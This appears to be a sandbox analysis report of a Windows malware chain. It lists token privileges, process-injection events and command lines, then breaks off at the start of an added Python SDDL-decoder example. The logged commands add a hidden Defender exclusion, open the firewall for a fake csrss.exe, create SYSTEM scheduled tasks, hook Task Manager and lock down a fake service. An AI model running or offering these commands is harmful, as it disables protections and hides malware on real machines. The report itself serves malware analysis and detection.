Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 (LUID 33 = SeIncreaseWorkingSetPrivilege; shown numerically because the sandbox does not resolve it) N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 (LUID 34 = SeTimeZonePrivilege; shown numerically because the sandbox does not resolve it) N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 (LUID 35 = SeCreateSymbolicLinkPrivilege; shown numerically because the sandbox does not resolve it) N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 (LUID 36 = SeDelegateSessionUserImpersonatePrivilege; shown numerically because the sandbox does not resolve it) N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 (LUID 33 = SeIncreaseWorkingSetPrivilege; shown numerically because the sandbox does not resolve it) N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 (LUID 34 = SeTimeZonePrivilege; shown numerically because the sandbox does not resolve it) N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 (LUID 35 = SeCreateSymbolicLinkPrivilege; shown numerically because the sandbox does not resolve it) N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 (LUID 36 = SeDelegateSessionUserImpersonatePrivilege; shown numerically because the sandbox does not resolve it) N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4960 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 4960 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 4960 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 4960 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 4960 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 4960 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 4960 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 4960 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 4960 wrote to memory of 3112 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 4960 wrote to memory of 3112 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 4960 wrote to memory of 3112 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 4284 wrote to memory of 3076 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\B8Ng9DuIJgnvrbMHtNWim1HP.exe
PID 4284 wrote to memory of 3076 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\B8Ng9DuIJgnvrbMHtNWim1HP.exe
PID 4284 wrote to memory of 3076 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\B8Ng9DuIJgnvrbMHtNWim1HP.exe
PID 3076 wrote to memory of 3400 N/A C:\Users\Admin\Pictures\B8Ng9DuIJgnvrbMHtNWim1HP.exe C:\Users\Admin\AppData\Local\Temp\u2dg.0.exe
PID 3076 wrote to memory of 3400 N/A C:\Users\Admin\Pictures\B8Ng9DuIJgnvrbMHtNWim1HP.exe C:\Users\Admin\AppData\Local\Temp\u2dg.0.exe
PID 3076 wrote to memory of 3400 N/A C:\Users\Admin\Pictures\B8Ng9DuIJgnvrbMHtNWim1HP.exe C:\Users\Admin\AppData\Local\Temp\u2dg.0.exe
PID 4284 wrote to memory of 3044 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe
PID 4284 wrote to memory of 3044 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe
PID 4284 wrote to memory of 3044 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe
PID 4284 wrote to memory of 3800 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe
PID 4284 wrote to memory of 3800 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe
PID 4284 wrote to memory of 3800 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe
PID 3044 wrote to memory of 3320 N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3044 wrote to memory of 3320 N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3044 wrote to memory of 3320 N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3800 wrote to memory of 1472 N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3800 wrote to memory of 1472 N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3800 wrote to memory of 1472 N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4284 wrote to memory of 4544 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe
PID 4284 wrote to memory of 4544 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe
PID 1300 wrote to memory of 4084 N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1300 wrote to memory of 4084 N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1300 wrote to memory of 4084 N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2884 wrote to memory of 1228 N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2884 wrote to memory of 1228 N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2884 wrote to memory of 1228 N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4284 wrote to memory of 3888 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\OYYF9HTQ5SJVtUftEvg2Vczg.exe
PID 4284 wrote to memory of 3888 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\OYYF9HTQ5SJVtUftEvg2Vczg.exe
PID 4284 wrote to memory of 3888 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\OYYF9HTQ5SJVtUftEvg2Vczg.exe
PID 4284 wrote to memory of 724 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
PID 4284 wrote to memory of 724 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
PID 4284 wrote to memory of 724 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
PID 724 wrote to memory of 2584 N/A C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
PID 724 wrote to memory of 2584 N/A C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
PID 724 wrote to memory of 2584 N/A C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
PID 724 wrote to memory of 1100 N/A C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\3BVFDXkt09D3q0LgQVE6DprB.exe
PID 724 wrote to memory of 1100 N/A C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\3BVFDXkt09D3q0LgQVE6DprB.exe
PID 724 wrote to memory of 1100 N/A C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\3BVFDXkt09D3q0LgQVE6DprB.exe
PID 724 wrote to memory of 1016 N/A C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
PID 724 wrote to memory of 1016 N/A C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
PID 724 wrote to memory of 1016 N/A C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
PID 3888 wrote to memory of 2088 N/A C:\Users\Admin\Pictures\OYYF9HTQ5SJVtUftEvg2Vczg.exe C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe
PID 3888 wrote to memory of 2088 N/A C:\Users\Admin\Pictures\OYYF9HTQ5SJVtUftEvg2Vczg.exe C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe
PID 3888 wrote to memory of 2088 N/A C:\Users\Admin\Pictures\OYYF9HTQ5SJVtUftEvg2Vczg.exe C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe
PID 1016 wrote to memory of 1116 N/A C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
PID 1016 wrote to memory of 1116 N/A C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
PID 1016 wrote to memory of 1116 N/A C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
PID 2088 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2088 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2088 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1508 wrote to memory of 1892 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SYSTEM32\schtasks.exe
PID 1508 wrote to memory of 1892 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SYSTEM32\schtasks.exe
PID 1508 wrote to memory of 1892 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SYSTEM32\schtasks.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe

"C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"

C:\Users\Admin\Pictures\B8Ng9DuIJgnvrbMHtNWim1HP.exe

"C:\Users\Admin\Pictures\B8Ng9DuIJgnvrbMHtNWim1HP.exe"

C:\Users\Admin\AppData\Local\Temp\u2dg.0.exe

"C:\Users\Admin\AppData\Local\Temp\u2dg.0.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3400 -ip 3400

C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe

"C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3400 -s 1128

C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe

"C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe

"C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe

"C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe"

C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe

"C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\Pictures\OYYF9HTQ5SJVtUftEvg2Vczg.exe

"C:\Users\Admin\Pictures\OYYF9HTQ5SJVtUftEvg2Vczg.exe"

C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe

"C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe" --silent --allusers=0

C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe

C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x6f17e1d0,0x6f17e1dc,0x6f17e1e8

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\3BVFDXkt09D3q0LgQVE6DprB.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\3BVFDXkt09D3q0LgQVE6DprB.exe" --version

C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe

.\Install.exe /nxdidQZJ "385118" /S

C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe

"C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=724 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240419140452" --session-guid=70a790ff-7af7-4039-a4c9-a3be2700ab7a --server-tracking-blob="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 " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=2804000000000000

C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe

C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x2bc,0x2c0,0x2c4,0x28c,0x2c8,0x6e02e1d0,0x6e02e1dc,0x6e02e1e8

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 14:06:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\AIZVKOw.exe\" em /OQsite_idAGR 385118 /S" /V1 /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\assistant_installer.exe" --version

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0xd86038,0xd86044,0xd86050

C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe

"C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3076 -ip 3076

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 1652

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
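What the sc sdset line above actually does, as an added example that is not part of the report: a small decoder for service-object SDDL that walks the DACL in the order the Windows access check does and answers who may stop, reconfigure or delete the masquerading "WinDefender" service. The descriptor string is the one from the command line above; the right-code and trustee tables are the standard SDDL abbreviations for service objects; the access check is a deliberately simplified model (no owner rights, no generic-right mapping, no MAXIMUM_ALLOWED) written for this example.

```python
import re

# Descriptor applied by the sample (copied from the "sc sdset WinDefender" line above).
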